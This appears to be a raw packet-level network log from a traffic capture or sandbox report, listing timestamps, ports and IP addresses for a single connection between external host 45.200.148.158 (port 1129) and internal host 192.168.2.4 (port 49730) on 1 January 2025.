Jan 1, 2025 18:10:02.300046921 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.300057888 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.300072908 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.300080061 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.300193071 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.300266027 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.300291061 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.300309896 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.300319910 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.300337076 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.300340891 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.300350904 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.300354004 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.300368071 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.300396919 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.300757885 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.300767899 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.300785065 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.300798893 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.300802946 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.300808907 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.300823927 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.300826073 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.300843954 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.300851107 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.300858974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.300868988 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.300885916 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.300887108 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.300899982 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.300918102 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.300919056 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.300940037 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.301455975 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.301474094 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.301491022 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.301501989 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.301508904 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.301517010 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.301527977 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.301537991 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.301547050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.301559925 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.301564932 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.301574945 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.301584959 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.301590919 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.301603079 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.301613092 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.301621914 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.301630020 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.301650047 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.301702023 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.301970005 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.301981926 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.301999092 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.302107096 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.302118063 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.302129984 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.302136898 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.302150011 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.302155018 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.302165031 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.302177906 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.302184105 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.302192926 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.302206039 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.302212000 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.302221060 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.302236080 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.302241087 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.302365065 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.302746058 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.302757025 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.302773952 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.302787066 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.302802086 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.302812099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.302828074 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.302830935 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.302830935 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.302840948 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.302854061 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.302937031 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.343607903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.343646049 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.343656063 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.343669891 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.343781948 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.343792915 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.343808889 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.343893051 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.343904018 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.343919039 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.343959093 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.353374958 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.353415012 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.353430986 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.353504896 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.353560925 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.353581905 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.353595972 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.353612900 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.353617907 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.353701115 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.353863955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.353924036 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.353935003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.353960991 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.354042053 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.354059935 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.354072094 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.354147911 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.354159117 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.354173899 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.354212999 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.360116959 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.360157967 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.360168934 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.360304117 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.360315084 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.360328913 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.360446930 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.360476017 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.360487938 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.360585928 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.360613108 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.360624075 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.360644102 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.360668898 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.360747099 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.360811949 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.360824108 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.360842943 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.360856056 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.360872030 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.360877991 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.360887051 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.360893011 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.360986948 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.361155987 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.361167908 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.361186028 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.361283064 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.361284971 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.361296892 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.361403942 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.367496014 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.367543936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.367554903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.367568970 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.367609024 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.367644072 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.367664099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.367707968 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.367820978 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.367831945 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.367851019 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.367934942 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.386600971 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.386660099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.386671066 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.386672974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.386744022 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.386754036 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.386769056 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.386811018 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.386837959 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.386850119 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.386889935 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.386956930 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.386965990 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.387033939 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.387042046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.387054920 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.387121916 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.387146950 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.387157917 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.387176037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.387190104 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.387197971 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.387298107 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.387473106 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.387484074 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.387501955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.387515068 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.387547970 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.387676001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.387686968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.387701988 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.387706041 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.387720108 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.387729883 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.387821913 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.387892962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.387988091 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.387999058 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.388014078 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.388024092 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.388027906 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.388042927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.388047934 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.388058901 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.388073921 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.388087034 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.388159037 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.391160965 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.391199112 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.391211987 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.391258955 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.391344070 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.391354084 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.391360044 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.391381025 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.391391993 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.391402960 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.391611099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.391622066 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.391640902 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.391653061 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.391661882 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.391669989 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.391688108 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.391693115 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.391998053 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.392009974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.392025948 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.392036915 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.392050028 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.392055988 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.392069101 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.392076969 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.392111063 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.392425060 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.392436028 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.392452955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.392465115 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.392471075 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.392481089 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.392493010 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.392503023 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.392510891 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.392524958 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.392532110 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.392549992 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.392857075 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.392867088 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.392885923 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.392899036 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.392909050 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.392913103 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.392929077 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.392935038 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.392941952 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.392951012 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.392956018 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.393021107 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.430748940 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.430773973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.430784941 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.430809975 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.430850029 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.430943012 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.430960894 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.430979013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.430993080 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.431001902 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.431094885 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.441982985 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.442004919 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.442014933 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.442070007 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.442131996 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.442142010 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.442171097 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.442183018 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.442195892 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.442308903 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.442696095 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.442763090 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.442774057 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.442792892 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.442806005 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.442962885 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.442975044 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.442994118 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.443006039 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.443021059 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.443058014 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.461719990 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.461783886 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.461797953 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.461823940 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.461956978 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.461967945 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.461987019 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.461997986 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.462011099 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.462049007 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.462312937 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.462322950 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.462340117 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.462352037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.462368011 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.462384939 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.462389946 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.462399960 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.462409019 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.462511063 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.462666988 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.462677002 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.462701082 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.462712049 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.462726116 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.462732077 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.462742090 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.462757111 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.462970972 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.468528032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.468538046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.468579054 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.468602896 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.468638897 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.468650103 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.468673944 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.468790054 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.468801022 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.468822956 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.468919992 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.487936020 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.487973928 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.487993002 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.488042116 CET	49730	1129	192.168.2.4	45.200.148.158
